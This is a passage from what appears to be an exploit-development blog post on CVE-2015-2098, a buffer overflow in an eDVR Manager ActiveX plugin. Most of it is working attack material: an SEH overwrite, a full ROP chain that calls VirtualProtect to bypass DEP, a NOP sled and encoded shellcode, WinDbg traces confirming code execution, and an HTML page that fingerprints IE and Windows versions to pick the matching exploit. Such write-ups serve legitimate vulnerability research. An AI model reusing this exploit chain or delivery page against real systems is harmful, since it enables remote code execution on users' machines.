buffer2= "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B";
var buffer = buffer1 + SEH_addr + SEH_hand + buffer2 ;
target.AudioOnlySiteChannel(buffer ,1 ) = 1
|
After the stack is realigned using our first ROP gadget, ESP is pointing to 41386341
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=1003c3f9 edx=770c720d esi=00000000 edi=00000000
eip=1003c3f9 esp=0492cbec ebp=0492cc0c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
WESPPlayback!DllUnregisterServer+0x2a849:
1003c3f9 81c4e0040000 add esp,4E0h
0:014> p
eax=00000000 ebx=00000000 ecx=1003c3f9 edx=770c720d esi=00000000 edi=00000000
eip=1003c3ff esp=0492d0cc ebp=0492cc0c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
WESPPlayback!DllUnregisterServer+0x2a84f:
1003c3ff c3 ret
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Google\Google Toolbar\Component\GoogleToolbarDynamic_32_75A7C54F0BE42E8E.dll -
0:014> dd esp
0492d0cc 41386341 64413963 31644130 41326441
0492d0dc 64413364 35644134 41366441 64413764
0492d0ec 39644138 41306541 65413165 33654132
0492d0fc 41346541 65413565 37654136 41386541
0492d10c 66413965 31664130 41326641 66413366
0492d11c 35664134 41366641 66413766 39664138
0492d12c 41306741 67413167 33674132 41346741
0492d13c 67413567 37674136 41386741 68413967
|
Let’s find the offset of this value (41386341)
!mona po 41386341
Pattern Ac8A (0x41386341) found in cyclic pattern at position 84
|
Now, we should add our ROP chain at the offset of 84 get our stack memory executable
for (i=0; i<128; i++)
{
buffer1 += "A";
}
var SEH_addr= "BBBB";
var SEH_hand= "\xF9\xC3\x03\x10";
/*
1003C3F9 ADD ESP,4E0
1003C3FF RETN
*/
for (j=0; j<84; j++)
{
buffer2 += "C";
}
ROP_chain =
"\x3d\x65\x37\x7c"+ // POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
"\xff\xfd\xff\xff"+ // Value to negate, will become 0x00000201 (dwSize)
"\x98\x7f\x34\x7c"+ // RETN (ROP NOP) [msvcr71.dll]
"\xa2\x15\x34\x7c"+ // JMP [EAX] [msvcr71.dll]
"\xff\xff\xff\xff"+ //
"\x02\x64\x37\x7c"+ // skip 4 bytes [msvcr71.dll]
"\x05\x1e\x35\x7c"+ // NEG EAX # RETN [msvcr71.dll]
"\x55\x52\x34\x7c"+ // INC EBX # FPATAN # RETN [msvcr71.dll]
"\x74\x21\x35\x7c"+ // ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
"\x87\x4f\x34\x7c"+ // POP EDX # RETN [msvcr71.dll]
"\xc0\xff\xff\xff"+ // Value to negate, will become 0x00000040
"\xb1\x1e\x35\x7c"+ // NEG EDX # RETN [msvcr71.dll]
"\x01\xd2\x34\x7c"+ // POP ECX # RETN [msvcr71.dll]
"\x01\xb0\x38\x7c"+ // &Writable location [msvcr71.dll]
"\x97\x7f\x34\x7c"+ // POP EAX # RETN [msvcr71.dll]
"\x51\xa1\x37\x7c"+ // ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
"\x81\x8c\x37\x7c"+ // PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
"\x30\x5c\x34\x7c"; // ptr to 'push esp # ret ' [msvcr71.dll]
var buffer = buffer1 + SEH_addr + SEH_hand + buffer2 + ROP_chain;
target.AudioOnlySiteChannel(buffer ,1 ) = 1;
|
After executing the above code, we can see successful code execution from the stack memory
(f18.edc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000124 ebx=10070001 ecx=43434323 edx=0461c9f8 esi=43434343 edi=43434323
eip=10027ed0 esp=0461c9dc ebp=0461caa4 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
WESPPlayback!DllUnregisterServer+0x16320:
10027ed0 8b81541c4200 mov eax,dword ptr [ecx+421C54h] ds:0023:43855f77=????????
0:014> g
(f18.edc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=00000201 ecx=0461cabc edx=770c70f4 esi=7c3415a2 edi=7c347f98
eip=0461cb1c esp=0461cb1c ebp=7c37a151 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
0461cb1c 005d8a add byte ptr [ebp-76h],bl ss:0023:7c37a0db=77
|
Now we need to fill our stack memory with some NOPs and a shellcode to execute the calculator. I have added a breakpoint (\xCC) in the start of calculator to confirm the code execution
for (i=0; i<128; i++)
{
buffer1 += "A";
}
var SEH_addr= "BBBB";
var SEH_hand= "\xF9\xC3\x03\x10";
/*
1003C3F9 ADD ESP,4E0
1003C3FF RETN
*/
for (j=0; j<84; j++)
{
buffer2 += "C";
}
ROP_chain =
"\x3d\x65\x37\x7c"+ // POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
"\xff\xfd\xff\xff"+ // Value to negate, will become 0x00000201 (dwSize)
"\x98\x7f\x34\x7c"+ // RETN (ROP NOP) [msvcr71.dll]
"\xa2\x15\x34\x7c"+ // JMP [EAX] [msvcr71.dll]
"\xff\xff\xff\xff"+ //
"\x02\x64\x37\x7c"+ // skip 4 bytes [msvcr71.dll]
"\x05\x1e\x35\x7c"+ // NEG EAX # RETN [msvcr71.dll]
"\x55\x52\x34\x7c"+ // INC EBX # FPATAN # RETN [msvcr71.dll]
"\x74\x21\x35\x7c"+ // ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
"\x87\x4f\x34\x7c"+ // POP EDX # RETN [msvcr71.dll]
"\xc0\xff\xff\xff"+ // Value to negate, will become 0x00000040
"\xb1\x1e\x35\x7c"+ // NEG EDX # RETN [msvcr71.dll]
"\x01\xd2\x34\x7c"+ // POP ECX # RETN [msvcr71.dll]
"\x01\xb0\x38\x7c"+ // &Writable location [msvcr71.dll]
"\x97\x7f\x34\x7c"+ // POP EAX # RETN [msvcr71.dll]
"\x51\xa1\x37\x7c"+ // ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
"\x81\x8c\x37\x7c"+ // PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
"\x30\x5c\x34\x7c"; // ptr to 'push esp # ret ' [msvcr71.dll]
for (k=0; k<100; k++)
{
NOP_sled += "\x90";
}
shellcode = "\xCC\xdb\xd7\xd9\x74\x24\xf4\xb8\x79\xc4\x64\xb7\x33\xc9\xb1\x38"+
"\x5d\x83\xc5\x04\x31\x45\x13\x03\x3c\xd7\x86\x42\x42\x3f\xcf"+
"\xad\xba\xc0\xb0\x24\x5f\xf1\xe2\x53\x14\xa0\x32\x17\x78\x49"+
"\xb8\x75\x68\xda\xcc\x51\x9f\x6b\x7a\x84\xae\x6c\x4a\x08\x7c"+
"\xae\xcc\xf4\x7e\xe3\x2e\xc4\xb1\xf6\x2f\x01\xaf\xf9\x62\xda"+
"\xa4\xa8\x92\x6f\xf8\x70\x92\xbf\x77\xc8\xec\xba\x47\xbd\x46"+
"\xc4\x97\x6e\xdc\x8e\x0f\x04\xba\x2e\x2e\xc9\xd8\x13\x79\x66"+
"\x2a\xe7\x78\xae\x62\x08\x4b\x8e\x29\x37\x64\x03\x33\x7f\x42"+
"\xfc\x46\x8b\xb1\x81\x50\x48\xc8\x5d\xd4\x4d\x6a\x15\x4e\xb6"+
"\x8b\xfa\x09\x3d\x87\xb7\x5e\x19\x8b\x46\xb2\x11\xb7\xc3\x35"+
"\xf6\x3e\x97\x11\xd2\x1b\x43\x3b\x43\xc1\x22\x44\x93\xad\x9b"+
"\xe0\xdf\x5f\xcf\x93\xbd\x35\x0e\x11\xb8\x70\x10\x29\xc3\xd2"+
"\x79\x18\x48\xbd\xfe\xa5\x9b\xfa\xf1\xef\x86\xaa\x99\xa9\x52"+
"\xef\xc7\x49\x89\x33\xfe\xc9\x38\xcb\x05\xd1\x48\xce\x42\x55"+
"\xa0\xa2\xdb\x30\xc6\x11\xdb\x10\xa5\xaf\x7f\xcc\x43\xa1\x1b"+
"\x9d\xe4\x4e\xb8\x32\x72\xc3\x34\xd0\xe9\x10\x87\x46\x91\x37"+
"\x8b\x15\x7b\xd2\x2b\xbf\x83";
var buffer = buffer1 + SEH_addr + SEH_hand + buffer2 + ROP_chain + NOP_sled + shellcode;
target.AudioOnlySiteChannel(buffer ,1 ) = 1;
|
Below is the start of our shellcode execution
(a38.390): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000280 ebx=10070001 ecx=43434323 edx=047ccf30 esi=43434343 edi=43434323
eip=10027ed0 esp=047ccf14 ebp=047ccfdc iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
WESPPlayback!DllUnregisterServer+0x16320:
10027ed0 8b81541c4200 mov eax,dword ptr [ecx+421C54h] ds:0023:43855f77=????????
0:014> g
(a38.390): Break instruction exception - code 80000003 (first chance)
eax=00000001 ebx=00000201 ecx=047ccff4 edx=770c70f4 esi=7c3415a2 edi=7c347f98
eip=047cd0b8 esp=047cd054 ebp=7c37a151 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
047cd0b8 cc int 3
0:014> dd eip
047cd0b8 d9d7dbcc b8f42474 b764c479 38b1c933
047cd0c8 04c5835d 03134531 4286d73c adcf3f42
047cd0d8 24b0c0ba 53e2f15f 1732a014 75b84978
047cd0e8 51ccda68 847a6b9f 084a6cae f4ccae7c
047cd0f8 c42ee37e 012ff6b1 da62f9af 6f92a8a4
047cd108 bf9270f8 baecc877 c446bd47 8edc6e97
047cd118 2eba040f 13d8c92e e72a6679 0862ae78
047cd128 37298e4b 7f330364 8b46fc42 485081b1
0:014> u eip
047cd0b8 cc int 3
047cd0b9 dbd7 fcmovnbe st,st(7)
047cd0bb d97424f4 fnstenv [esp-0Ch]
047cd0bf b879c464b7 mov eax,0B764C479h
047cd0c4 33c9 xor ecx,ecx
047cd0c6 b138 mov cl,38h
047cd0c8 5d pop ebp
047cd0c9 83c504 add ebp,4
|
After passing the above breakpoint, we are successfully able to execute the calculator shellcode
Now were successfully able to create exploits which are working on the following platforms:
Ø Internet Explorer 7 / Windows XP
Ø Internet Explorer 8 / Windows XP (DEP Bypass)
Ø Internet Explorer 8 / Windows 7 (DEP & ASLR Bypass)
Now, we can use some Javascript tricks to auto detect the IE and OS version and choose the exploit code accordingly. Below snippet of code can be used for the same:
<html>
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'>
</object>
<script>
function isIE () {
var myNav = navigator.userAgent.toLowerCase();
return (myNav.indexOf('msie') != -1) ? parseInt(myNav.split('msie')[1]) : false;
}
if (navigator.appVersion.indexOf("Windows NT 5.1")!=-1)
{
// Windows XP
document.write("windows xp");
if (isIE () == 7) {
// IE7 - Windows XP exploit code
document.write("IE 7");
} else if (isIE () == 8){
// IE8 – Windows XP exploit Code
document.write("IE 8");
}
}
if (navigator.appVersion.indexOf("Windows NT 6.1")!=-1)
{
//Windows 7
document.write("windows 7");
if (isIE () == 8) {
// IE8 – Windows7 exploit code
document.write("IE 8");
}
}
</script>
</html>
|
Conclusion
As shown in this post, we did some analysis of CVE-2015-2098 i.e. eDVR Manager ActiveX plugin buffer overflow vulnerability to leverage code execution on Windows XP and Windows 7 machine